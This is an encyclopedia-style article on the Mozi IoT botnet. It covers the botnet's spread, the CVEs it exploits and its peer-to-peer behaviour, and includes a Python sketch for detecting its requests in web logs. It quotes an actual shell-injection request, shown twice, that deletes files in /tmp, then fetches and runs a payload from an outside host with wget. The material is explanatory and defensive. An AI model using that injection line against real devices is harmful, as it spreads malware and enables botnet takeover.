Mozi botnet

From EverybodyWiki Bios & Wiki




The Mozi botnet is a botnet targeting IoT devices. In September 2019, 71% of the botnet was located in China. In March, it jumped to 81%.[1] The botnet was first discovered near the end of 2019 and is currently active. Similar to the Mirai botnet, it targets consumer routers via security vulnerabilities and shell injections.[2] It uses peer-to-peer technology to spread infectious code to new hosts.[3]

Behavior

[Figure: Log of a command injection by the Mozi Botnet]

While the botnet can target IoT devices via weak telnet passwords, it can also exploit devices over HTTP.[4]

115.51.xx.xx - - [13/Nov/2020:15:54:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.51.xx.xx:36669/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 4214 "-" "Hello, world"

In the request above, an infected host attempts to make the requested server download and execute the "Mozi.a" file. The infected host serves the Mozi.a file itself on a random port. Targeted hosts include routers and DVRs.
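A defender can look for this request shape in web server access logs. The following Python sketch is an added example, not part of the original article: it parses Combined Log Format lines, decodes the request target, and flags a shell separator followed directly by wget or curl fetching a URL. The function names, the patterns and the two benign sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
# Shell separator, then a downloader with a URL; a search that merely mentions "wget" does not match.
CHAIN_RE = re.compile(
    r'(?:[;|&`]|\$\()\s*(?:wget|curl)\s+(?:-\S+\s+)*'
    r'(?P<url>(?:https?|ftp)://[^\s;|&`]+)'
)
CHMOD_RE = re.compile(r'\bchmod\s+\+?[0-7x]+\s')

def analyze(line):
    """Return a finding dict for a download-and-run request, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    decoded = unquote_plus(m["target"])  # '+' and %xx become what the shell would see
    chain = CHAIN_RE.search(decoded)
    if not chain:
        return None
    payload = urlsplit(chain["url"])
    return {
        "source": m["src"],
        "status": int(m["status"]),
        "payload_url": chain["url"],
        "payload_port": payload.port,
        # True when the requesting host also serves the file, as the article describes.
        "self_hosted": payload.hostname == m["src"],
        "sets_executable": bool(CHMOD_RE.search(decoded)),
        "agent": m["agent"],
    }

SAMPLE_LOG = [  # first line is the request quoted in the article; the others are constructed
    '115.51.xx.xx - - [13/Nov/2020:15:54:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.51.xx.xx:36669/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 4214 "-" "Hello, world"',
    '203.0.113.7 - - [13/Nov/2020:15:55:02 -0500] "GET /search?q=how+to+use+wget+on+linux&page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Nov/2020:15:56:40 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

def scan(lines):
    return [f for f in map(analyze, lines) if f]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The 404 status on the flagged line shows the receiving server had no such endpoint, so the request is evidence of a probe rather than of a compromise.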

The botnet targets the following vulnerabilities:

CVE-2017-17215

CVE-2018-10561

CVE-2018-10562

CVE-2014-8361

CVE-2008-4873

CVE-2016-6277

CVE-2015-2051

The malware placed on the server is designed to interact with other peers to exchange information. The malware can be executed on ARM or MIPS processors. Once a host is infected, it can carry out DDoS attacks, payload execution, and additional distribution of the malware.

References

  1. "New Mozi malware family quietly amasses IoT bots". Lumen. 2020-04-13. Retrieved 2021-03-28.
  2. "A New Botnet Attack Just Mozied Into Town". Security Intelligence. Retrieved 2021-03-28.
  3. "Mozi Botnet Accounts for Most Traffic in Q1 2020, New Research Shows". Bitdefender Box. Retrieved 28 March 2021.
  4. "New Mozi malware family quietly amasses IoT bots". Lumen. 2020-04-13. Retrieved 2021-03-28.

Mozi Botnet Article Submission

This article "Mozi botnet" is from Wikipedia. The list of its authors can be seen in its historical and/or the page Edithistory:Mozi botnet. Articles copied from Draft Namespace on Wikipedia could be seen on the Draft Namespace of Wikipedia and not main one.